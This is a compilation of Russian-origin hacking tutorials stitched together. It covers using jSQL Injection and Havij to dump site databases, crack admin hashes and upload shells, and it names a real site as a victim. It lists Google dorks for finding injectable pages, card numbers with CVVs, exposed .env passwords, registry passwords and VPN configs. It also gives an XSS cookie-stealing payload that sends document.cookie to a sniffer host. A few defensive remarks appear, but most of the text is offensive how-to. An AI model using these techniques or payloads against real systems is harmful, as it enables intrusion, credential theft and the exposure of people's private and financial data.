Run the downloaded file by double clicking (you need to have a virtual machine).
3. Anonymity when checking the site for SQL injectionsSetting up Tor and Privoxy in Kali Linux
[Section under development]
Setting up Tor and Privoxy on Windows[Section under development]
jSQL Injection proxy settings[Section under development]
Working with the program is extremely simple. Just enter the site address and press ENTER.
The following screenshot shows that the site is vulnerable to three types of SQL injections at once (information about them is indicated in the lower right corner). By clicking on the names of the injections, you can switch the method used:
Also, we have already displayed the existing databases.
You can see the contents of each table:
Usually, the most interesting part of the tables is the administrator credentials.
If you are lucky and you found the administrator's data, then it's too early to rejoice. You also need to find the admin panel, where to enter these data.
5. Search for admins with jSQL InjectionTo do this, go to the next tab. Here we are met by a list of possible addresses. You can select one or more pages to check:
The convenience is that you do not need to use other programs.
Unfortunately, there are not very many careless programmers who store passwords in clear text. Quite often in the password string we see something like
8743b52063cd84097a65d1633f5c74f5
This is a hash. You can decrypt it with brute force. And… jSQL Injection has a built-in brute-forcer.
6. Brute-forcing hashes with jSQL InjectionUndoubted convenience is that you do not need to look for other programs. There is support for many of the most popular hashes.
This is not the best option. In order to become a guru in deciphering hashes, the book "" in Russian is recommended.
But, of course, when there is no other program at hand or there is no time to study, jSQL Injection with a built-in brute-force function will come in handy.
There are settings: you can set which characters are included in the password, the password length range.
7. File operations after SQL injection detectionIn addition to operations with databases - reading and modifying them, if SQL injections are detected, the following file operations can be performed:
- reading files on the server
- uploading new files to the server
- uploading shells to the server
And all this is implemented in jSQL Injection!
There are limitations - the SQL server must have file privileges. With reasonable system administrators, they are disabled and access to the file system cannot be obtained.
The presence of file privileges is easy enough to check. Go to one of the tabs (reading files, creating a shell, uploading a new file) and try to perform one of the indicated operations.
Another very important note - we need to know the exact absolute path to the file with which we will work - otherwise nothing will work.
Look at the following screenshot:
Any attempt to operate on a file is answered with: No FILE privilege (no file privileges). And nothing can be done here.
If instead you have another error:
Problem writing into [directory_name]
This means that you incorrectly specified the absolute path where you want to write the file.
In order to assume an absolute path, one must at least know the operating system the server is running on. To do this, switch to the Network tab.
Such an entry (string Win64 ) gives us reason to assume that we are dealing with Windows OS:
Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Connection: Keep-Alive Method: HTTP/1.1 200 OK Content-Length: 353 Date: Fri, 11 Dec 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8
Here we have some Unix (*BSD, Linux):
Transfer-Encoding: chunked Date: Fri, 11 Dec 2015 11:57:02 GMT Method: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)
And here we have CentOS:
Method: HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Connection: keep-alive X-Cache-Lookup: MISS from t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS from t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Date: Fri, 11 Dec 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251
On Windows, a typical site folder is C:\Server\data\htdocs\ . But, in fact, if someone "thought" of making a server on Windows, then, very likely, this person has not heard anything about privileges. Therefore, you should start trying directly from the C: / Windows / directory:
As you can see, everything went perfectly the first time.
But the jSQL Injection shells themselves raise my doubts. If you have file privileges, then you may well upload something with a web interface.
8. Bulk checking sites for SQL injectionsAnd even jSQL Injection has this feature. Everything is extremely simple - upload a list of sites (can be imported from a file), select those that you want to check and click the appropriate button to start the operation.
jSQL Injection is a good, powerful tool for finding and then using SQL injections found on sites. Its undoubted advantages: ease of use, built-in related functions. jSQL Injection can be a beginner's best friend when analyzing websites.
Of the shortcomings, I would note the impossibility of editing databases (at least I did not find this functionality). As with all tools with a graphical interface, the inability to use in scripts can be attributed to the disadvantages of this program. Nevertheless, some automation is possible in this program too - thanks to the built-in mass site check function.
jSQL Injection is much more convenient to use than sqlmap . But sqlmap supports more kinds of SQL injection, has file firewall options, and some other features.
Bottom line: jSQL Injection is a beginner hacker's best friend.
You can find help for this program in the Kali Linux Encyclopedia on this page: http://kali.tools/?p=706
And so, now I will talk about how to hack something without special knowledge of anything. I say right away, there is little benefit from this, but still.First, you need to find the sites themselves. To do this, go to google.com and search for dorks
Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"
here's a little snippet. You can use yours. And so, we found the site. For example http://www.vestitambov.ru/
Next, download this program
Click OK. Then we insert the site of the victim.
We press start. Next, we are waiting for the results.
And so, the program found a SQL vulnerability.
Next, download Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= paste the resulting link there. I won’t explain how to use Havij and where to download it, it’s not difficult to find it. All. You have received the data you need - the administrator password, and then it's up to your imagination.
P.S. This is my first attempt at writing something. I'm sorry if it's wrong
I decided to talk a little about information security. The article will be useful for novice programmers and those who have just started doing Frontend development. What is the problem?
Many novice developers are so addicted to writing code that they completely forget about the security of their work. And most importantly, they forget about such vulnerabilities as SQL query, XXS. They also come up with easy passwords for their administrative panels and are subjected to brute force. What are these attacks and how can they be avoided?
SQL injectionSQL injection is the most common type of database attack that is carried out with a SQL query for a specific DBMS. Many people and even large companies suffer from such attacks. The reason is a developer's mistake when writing a database and, in fact, SQL queries.
An SQL injection type attack is possible due to incorrect processing of input data used in SQL queries. With a successful attack by a hacker, you run the risk of losing not only the contents of the databases, but also the passwords and logs of the administrative panel, respectively. And this data will be quite enough to completely take over the site or make irreversible adjustments to it.
The attack can be successfully reproduced in scripts written in PHP, ASP, Perl and other languages. The success of such attacks depends more on which DBMS is used and how the scenario itself is implemented. There are a lot of vulnerable sites for SQL injections in the world. This is easy to verify. It is enough to enter "dorks" - these are special requests for finding vulnerable sites. Here are some of them:
- inurl:index.php?id=
- inurl:trainers.php?id=
- inurl:buy.php?category=
- inurl:article.php?ID=
- inurl:play_old.php?id=
- inurl:declaration_more.php?decl_id=
- inurl:pageid=
- inurl:games.php?id=
- inurl:page.php?file=
- inurl:newsDetail.php?id=
- inurl:gallery.php?id=
- inurl:article.php?id=
How to use them? It is enough to enter them into the Google or Yandex search engine. The search engine will give you not just a vulnerable site, but also a page for this vulnerability. But we will not stop there and make sure that the page is really vulnerable. For this, it is enough to put a single quote “‘” after the value “id=1”. Something like this:
- inurl:games.php?id=1'
And the site will give us an error about the SQL query. What does our hacker need next?
And then he needs this very link to the page with an error. Then work on the vulnerability in most cases takes place in the "Kali linux" distribution with its utilities for this part: the introduction of the injection code and the performance of the necessary operations. How this will happen, I cannot tell you. But you can find information about this on the Internet.
XSS Attack
This type of attack is carried out on cookies. They, in turn, are very fond of saving users. Why not? How without them? After all, thanks to Cookies, we do not drive in a password from Vk.com or Mail.ru a hundred times. And there are few who refuse them. But on the Internet, a rule often appears for hackers: the coefficient of convenience is directly proportional to the coefficient of insecurity.
To implement an XSS attack, our hacker needs JavaScript knowledge. The language at first glance is very simple and harmless, because it does not have access to computer resources. A hacker can work with JavaScript only in a browser, but that's enough. After all, the main thing is to enter the code into the web page.
I won't go into detail about the attack process. I will tell only the basics and the meaning of how this happens.
A hacker can add JS code to some forum or guestbook:
document.location.href="http://192.168.1.7/sniff.php?test"
Scripts redirect us to an infected page where the code will be executed: be it a sniffer, some kind of storage or an exploit that will somehow steal our Cookies from the cache.
Why JavaScript? Because JavaScript is great with web requests and has access to cookies. But if our script will transfer us to some site, then the user will easily notice this. Here, the hacker uses a more cunning option - he simply enters the code into the picture.
Img=newImage();
Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;
We simply create an image and assign our script to it as an address.
How to protect yourself from all this? Very simple - do not follow suspicious links.
DoS and DDos Attacks
DoS (from the English Denial of Service - denial of service is a hacker attack on a computer system with the aim of bringing it to failure. This is the creation of such conditions under which conscientious users of the system cannot access the provided system resources (servers), or this access is difficult. The failure of the system can also be a step towards its capture if, in an emergency situation, the software gives out any critical information: for example, the version, part of the program code, etc. But most often it is a measure of economic pressure: the loss of a simple service that generates income. Bills from the provider or measures to avoid the attack significantly hit the “target” in the pocket. Currently, DoS and DDoS attacks are the most popular, as they allow you to bring almost any system to failure without leaving legally significant evidence.
What is the difference between DoS and DDos attacks?
DoS is an attack built in a smart way. For example, if the server does not check the correctness of incoming packets, then a hacker can make such a request that will be processed forever, and there will not be enough processor time to work with other connections. Accordingly, customers will receive a denial of service. But it will not work to overload or disable large well-known sites in this way. They are armed with fairly wide channels and super-powerful servers that can easily cope with such an overload.
DDoS is actually the same attack as DoS. But if in DoS there is one request packet, then in DDoS there may very well be hundreds or more of them. Even heavy-duty servers may not be able to cope with such an overload. I'll give you an example.
A DoS attack is when you are having a conversation with someone, but then some ill-mannered person comes up and starts screaming loudly. Talking is either impossible or very difficult. Solution: call security, which will calm and take the person out of the room. DDoS attacks are when thousands of such ill-mannered people run in. In this case, the guards will not be able to twist and take everyone away.
DoS and DDoS are produced from computers, the so-called zombies. These are computers of users hacked by hackers who do not even suspect that their machine is involved in the attack of any server.
How to protect yourself from this? In general, no way. But you can complicate the task of a hacker. To do this, you need to choose a good hosting with powerful servers.
Brute force attack
A developer can come up with a lot of attack protection systems, fully review the scripts we have written, check the site for vulnerabilities, etc. But when it comes to the last step of the site layout, namely when it will just put a password on the admin panel, he can forget about one thing. Password!
It is strongly not recommended to set a simple password. It can be 12345, 1114457, vasya111, etc. It is not recommended to set passwords less than 10-11 characters long. Otherwise, you may be subject to the most common and not complex attack - Brute Force.
Brute force is a dictionary-based password brute-force attack using special programs. Dictionaries can be different: Latin, sorting by numbers, let's say up to some range, mixed (Latin + numbers), and there are even dictionaries with unique symbols @#4$%&*~~`'”\ ? etc.
Of course, this type of attack is easy to avoid. It is enough to come up with a complex password. Even captcha can save you. And also, if your site is made on CMS, then many of them calculate a similar type of attack and block ip. We must always remember that the more different characters in the password, the harder it is to pick it up.
How do hackers work? In most cases, they either suspect or already know part of the password. It is quite logical to assume that the user's password will certainly not consist of 3 or 5 characters. Such passwords lead to frequent hacks. Basically, hackers take a range of 5 to 10 characters and add a few characters there that they probably know in advance. Next, generate passwords with the desired ranges. The Kali linux distribution even has programs for such cases. And voila, the attack will no longer last long, since the volume of the dictionary is no longer so large. In addition, a hacker can use the power of the video card. Some of them support the CUDA system, while the enumeration speed increases by as much as 10 times. And now we see that an attack in such a simple way is quite real. But not only sites are subjected to brute force.
Dear developers, never forget about the information security system, because today many people, including states, suffer from such types of attacks. After all, the biggest vulnerability is a person who can always be distracted somewhere or overlook somewhere. We are programmers, but not programmed machines. Be always on the alert, because the loss of information threatens with serious consequences!
Receiving private data does not always mean hacking - sometimes it is published in the public domain. Knowing the Google settings and a little ingenuity will allow you to find a lot of interesting things - from credit card numbers to FBI documents.
WARNING All information is provided for informational purposes only. Neither the editors nor the author are responsible for any possible harm caused by the materials of this article.Everything is connected to the Internet today, caring little about restricting access. Therefore, many private data become the prey of search engines. Spider robots are no longer limited to web pages, but index all content available on the Web and constantly add confidential information to their databases. Learning these secrets is easy - you just need to know how to ask about them.
Looking for filesIn capable hands, Google will quickly find everything that is bad on the Web, such as personal information and files for official use. They are often hidden like a key under a rug: there are no real access restrictions, the data just lies in the back of the site, where links do not lead. The standard Google web interface provides only basic advanced search settings, but even these will be enough.
There are two operators you can use to restrict Google searches to files of a certain type: filetype and ext . The first sets the format that the search engine determined by the file header, the second - the file extension, regardless of its internal content. When searching in both cases, you need to specify only the extension. Initially, the ext operator was convenient to use in cases where there were no specific format features for the file (for example, to search for ini and cfg configuration files, which can contain anything). Now Google's algorithms have changed, and there is no visible difference between the operators - the results are the same in most cases.
Filtering the output By default, Google searches for words and in general for any characters entered in all files on indexed pages. You can limit the search scope by the top-level domain, a specific site, or by the location of the desired sequence in the files themselves. For the first two options, the site statement is used, followed by the name of the domain or the selected site. In the third case, a whole set of operators allows you to search for information in service fields and metadata. For example, allinurl will find the specified in the body of the links themselves, allinanchor - in the text provided with the tag , allintitle - in the page headers, allintext - in the body of the pages.
For each operator there is a lighter version with a shorter name (without the prefix all). The difference is that allinurl will find links with all words, while inurl will only find links with the first of them. The second and subsequent words from the query can appear anywhere on web pages. The inurl operator also differs from another similar in meaning - site . The first one also allows you to find any sequence of characters in the link to the desired document (for example, /cgi-bin/), which is widely used to find components with known vulnerabilities.
Let's try it in practice. We take the allintext filter and make the query return a list of credit card numbers and verification codes, which will expire only after two years (or when their owners get tired of feeding everyone in a row).
Allintext: card number expiration date /2017 cvv 
When you read on the news that a young hacker "hacked into the servers" of the Pentagon or NASA, stealing classified information, then in most cases it is precisely this elementary technique of using Google. Suppose we are interested in a list of NASA employees and their contact details. Surely such a list is in electronic form. For convenience or due to an oversight, it can also lie on the organization's website itself. It is logical that in this case there will be no references to it, since it is intended for internal use. What words can be in such a file? At least - the field "address". It is easy to test all these assumptions.
inurl:nasa.gov filetype:xlsx "address"
We use bureaucracy Such finds are a pleasant trifle. The really solid catch comes from a more detailed knowledge of Google Webmaster Operators, the Web itself, and the structure of what you're looking for. Knowing the details, you can easily filter the output and refine the properties of the files you need in order to get really valuable data in the rest. It's funny that bureaucracy comes to the rescue here. It produces typical formulations that make it convenient to search for secret information that has accidentally leaked onto the Web.
For example, the Distribution statement stamp, which is mandatory in the office of the US Department of Defense, means standardized restrictions on the distribution of a document. The letter A marks public releases in which there is nothing secret; B - intended for internal use only, C - strictly confidential, and so on up to F. Separately, there is the letter X, which marks especially valuable information that represents a state secret of the highest level. Let those who are supposed to do it on duty look for such documents, and we will limit ourselves to files with the letter C. According to DoDI 5230.24, such marking is assigned to documents containing a description of critical technologies that fall under export control. You can find such carefully guarded information on sites in the .mil top-level domain allocated to the US Army.
"DISTRIBUTION STATEMENT C" inurl:navy.mil 
It is very convenient that only sites from the US Department of Defense and its contract organizations are collected in the .mil domain. Domain-limited search results are exceptionally clean, and the titles speak for themselves. It is practically useless to search for Russian secrets in this way: chaos reigns in the .ru and .rf domains, and the names of many weapons systems sound like botanical (PP "Kiparis", self-propelled guns "Acacia") or even fabulous (TOS "Pinocchio").
By carefully examining any document from a site in the .mil domain, you can see other markers to refine your search. For example, a reference to the export restrictions "Sec 2751", which is also convenient to search for interesting technical information. From time to time, it is removed from official sites, where it once appeared, so if you can’t follow an interesting link in the search results, use the Google cache (cache operator) or the Internet Archive website.
We climb into the cloudsIn addition to accidentally declassified documents from government departments, links to personal files from Dropbox and other data storage services that create "private" links to publicly published data occasionally pop up in the Google cache. It's even worse with alternative and self-made services. For example, the following query finds the data of all Verizon clients that have an FTP server installed and actively using a router on their router.
Allinurl:ftp://verizon.net
There are now more than forty thousand such smart people, and in the spring of 2015 there were an order of magnitude more. Instead of Verizon.net, you can substitute the name of any well-known provider, and the more famous it is, the larger the catch can be. Through the built-in FTP server, you can see files on an external drive connected to the router. Usually this is a NAS for remote work, a personal cloud, or some kind of peer-to-peer file download. All the content of such media is indexed by Google and other search engines, so you can access files stored on external drives via a direct link.
Before the wholesale migration to the clouds, simple FTP servers, which also lacked vulnerabilities, ruled as remote storages. Many of them are still relevant today. For example, the popular WS_FTP Professional program stores configuration data, user accounts, and passwords in the ws_ftp.ini file. It is easy to find and read because all entries are stored in plain text and passwords are encrypted using the Triple DES algorithm after minimal obfuscation. In most versions, simply discarding the first byte is sufficient.
Decrypting such passwords is easy using the WS_FTP Password Decryptor utility or a free web service.
When talking about hacking an arbitrary site, they usually mean getting a password from logs and backups of CMS or e-commerce application configuration files. If you know their typical structure, then you can easily indicate the keywords. Lines like those found in ws_ftp.ini are extremely common. For example, Drupal and PrestaShop always have a user ID (UID) and a corresponding password (pwd), and all information is stored in files with the .inc extension. You can search for them like this:
"pwd=" "UID=" ext:inc
We reveal passwords from the DBMSIn the configuration files of SQL servers, user names and email addresses are stored in clear text, and instead of passwords, their MD5 hashes are recorded. Decrypting them, strictly speaking, is impossible, but you can find a match among known hash-password pairs.
Until now, there are DBMSs that do not even use password hashing. The configuration files of any of them can simply be viewed in the browser.
Intext:DB_PASSWORD filetype:env
With the advent of Windows servers, the place of configuration files was partly taken by the registry. You can search through its branches in exactly the same way, using reg as the file type. For example, like this:
Filetype:reg HKEY_CURRENT_USER "Password"=
Sometimes it is possible to get to classified information with the help of data accidentally opened and caught by Google. The ideal option is to find a list of passwords in some common format. Only desperate people can store account information in a text file, a Word document, or an Excel spreadsheet, but there are always enough of them.
Filetype:xls inurl:password
On the one hand, there are many means to prevent such incidents. It is necessary to specify adequate access rights in htaccess, patch CMS, do not use left scripts and close other holes. There is also a file with a robots.txt exclusion list, which prohibits search engines from indexing the files and directories specified in it. On the other hand, if the robots.txt structure on some server differs from the standard one, then it immediately becomes clear what they are trying to hide on it.
The list of directories and files on any site is preceded by the standard inscription index of. Since it must appear in the title for service purposes, it makes sense to limit its search to the intitle operator. Interesting stuff can be found in the /admin/, /personal/, /etc/ and even /secret/ directories.
Relevance is extremely important here: old vulnerabilities are closed very slowly, but Google and its search results are constantly changing. There is even a difference between the "last second" filter (&tbs=qdr:s at the end of the request url) and the "real time" filter (&tbs=qdr:1).
The time interval of the last file update date from Google is also implicitly indicated. Through the graphical web interface, you can select one of the typical periods (hour, day, week, and so on) or set a date range, but this method is not suitable for automation.
From the appearance of the address bar, one can only guess about a way to limit the output of results using the &tbs=qdr: construct. The letter y after it specifies a limit of one year (&tbs=qdr:y), m shows the results for the last month, w for the week, d for the past day, h for the last hour, n for the minute, and s for the give me a sec. The most recent results just made known to Google are found using the &tbs=qdr:1 filter.
If you need to write a tricky script, it will be useful to know that the date range is set in Google in Julian format through the daterange operator. For example, this is how you can find a list of PDF documents with the word confidential uploaded between January 1st and July 1st, 2015.
Confidential filetype:pdf daterange:2457024-2457205
The range is specified in Julian date format without decimals. It is inconvenient to translate them manually from the Gregorian calendar. It's easier to use a date converter.
Targeting and filtering againIn addition to specifying additional operators in the search query, they can be sent directly in the link body. For example, the filetype:pdf trait corresponds to the as_filetype=pdf construct. Thus, it is convenient to set any clarifications. Let's say that the output of results only from the Republic of Honduras is set by adding the construction cr=countryHN to the search URL, but only from the city of Bobruisk - gcs=Bobruisk . See the developer section for a complete list of .
Google's automation tools are designed to make life easier, but often add to the hassle. For example, a user's city is determined by the user's IP through WHOIS. Based on this information, Google not only balances the load between servers, but also changes the search results. Depending on the region, for the same query, different results will get to the first page, and some of them may turn out to be completely hidden. Feel like a cosmopolitan and search for information from any country will help its two-letter code after the directive gl=country . For example, the code for the Netherlands is NL, while the Vatican and North Korea do not have their own code in Google.
Often search results are littered even after using a few advanced filters. In this case, it is easy to refine the query by adding a few exception words to it (each of them is preceded by a minus sign). For example, banking , names , and tutorial are often used with the word Personal. Therefore, cleaner search results will show not a textbook example of a query, but a refined one:
Intitle:"Index of /Personal/" -names -tutorial -banking
Last ExampleA sophisticated hacker is distinguished by the fact that he provides himself with everything he needs on his own. For example, a VPN is a convenient thing, but either expensive or temporary and with restrictions. Signing up for yourself alone is too expensive. It's good that there are group subscriptions, and with the help of Google it's easy to become part of a group. To do this, just find the Cisco VPN configuration file, which has a rather non-standard PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles . One request, and you join, for example, the friendly staff of the University of Bonn.
Filetype:pcf vpn OR Group
The passwords are stored in encrypted form, but Maurice Massard has already written a program to decrypt them and is providing it for free via thecampusgeeks.com.
With the help of Google, hundreds of different types of attacks and penetration tests are performed. There are many options, affecting popular programs, major database formats, numerous PHP vulnerabilities, clouds, and so on. Knowing exactly what you're looking for makes it much easier to get the information you need (especially the information you didn't intend to make public). Not only Shodan feeds interesting ideas, but any database of indexed network resources!